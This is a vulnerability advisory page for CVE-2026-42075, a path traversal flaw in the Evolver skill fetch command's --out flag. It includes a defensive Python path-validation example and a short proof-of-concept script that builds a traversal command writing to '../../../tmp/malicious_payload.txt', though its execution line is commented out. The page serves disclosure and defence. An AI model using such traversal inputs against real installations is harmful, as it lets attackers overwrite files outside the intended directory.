Security Vulnerability Report
CVE-2026-42075 CVSS 8.1 HIGH


Published: 2026-05-04 17:16:24
Last Modified: 2026-05-07 15:43:40

Description

Evolver is a GEP-powered self-evolving engine for AI agents. Prior to version 1.69.3, a path traversal vulnerability in the skill download (fetch) command allows attackers to write files to arbitrary locations on the filesystem. The --out= flag accepts user-provided paths without validation, enabling directory traversal attacks that can overwrite critical system files or create files in sensitive locations. This issue has been patched in version 1.69.3.
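The missing check, written out as an added Python example (not Evolver's own code, which is not on this page): a --out value is accepted only if its fully resolved destination stays inside the skills directory. The skills directory path and the function names are assumptions.

```python
import os
from pathlib import Path


class UnsafeOutputPath(ValueError):
    """Raised when a --out value would land outside the skills directory."""


def resolve_out_path(skills_dir: str, user_out: str) -> Path:
    """Return the absolute destination for a fetched skill, or raise.

    Compares fully resolved paths instead of string prefixes, so '..'
    segments, symlinked parents and look-alike names such as 'skills2'
    cannot escape skills_dir. Absolute --out values are refused outright.
    """
    base = Path(skills_dir).resolve()
    if os.path.isabs(user_out):
        raise UnsafeOutputPath(f"absolute --out not allowed: {user_out!r}")
    # Non-strict resolve: parents are followed, the final file may not exist yet.
    candidate = (base / user_out).resolve()
    try:
        candidate.relative_to(base)
    except ValueError:
        raise UnsafeOutputPath(
            f"--out escapes {base}: {user_out!r} -> {candidate}") from None
    if candidate == base:
        raise UnsafeOutputPath("--out must name a file inside the skills directory")
    return candidate


def is_safe_out(skills_dir: str, user_out: str) -> bool:
    """True if resolve_out_path accepts user_out, False if it rejects it."""
    try:
        resolve_out_path(skills_dir, user_out)
        return True
    except UnsafeOutputPath:
        return False


if __name__ == "__main__":
    # Constructed inputs: the traversal string from the PoC plus benign names.
    # The skills directory is a hypothetical install location, not Evolver's.
    for out in ["example_skill.json", "nested/dir/skill.json",
                "../../../tmp/malicious_payload.txt", "/etc/passwd", "."]:
        verdict = "ok" if is_safe_out("/opt/evolver/skills", out) else "REJECTED"
        print(f"{out!r:42} -> {verdict}")
```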

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Evolver < 1.69.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-42075: Path Traversal in Evolver
# Vulnerable versions: < 1.69.3
# This script demonstrates the path traversal vulnerability
# by exploiting the '--out' flag in the skill fetch command.
import sys
import subprocess

def exploit_poc():
    target_file = "../../../tmp/malicious_payload.txt"
    skill_name = "example_skill"
    print(f"[*] Attempting to write to arbitrary path: {target_file}")
    # Simulating the vulnerable command execution
    # In a real scenario, the attacker controls the '--out' argument
    try:
        # Command structure: evolver fetch <skill> --out <path>
        cmd = ["evolver", "fetch", skill_name, "--out", target_file]
        print(f"[*] Executing: {' '.join(cmd)}")
        # Note: This is a simulation. Actual execution depends on environment.
        # result = subprocess.run(cmd, capture_output=True)
        print("[+] If vulnerable, the file has been written outside the intended directory.")
    except Exception as e:
        print(f"[-] Error during PoC execution: {e}")

if __name__ == "__main__":
    exploit_poc()

References

https://github.com/EvoMap/evolver/releases/tag/v1.69.3 (release fixing the issue)
https://github.com/EvoMap/evolver/security/advisories/GHSA-r466-rxw4-3j9j (GitHub security advisory)

Weakness: CWE-22 (Improper Limitation of a Pathname to a Restricted Directory, 'Path Traversal')
NVD status: Deferred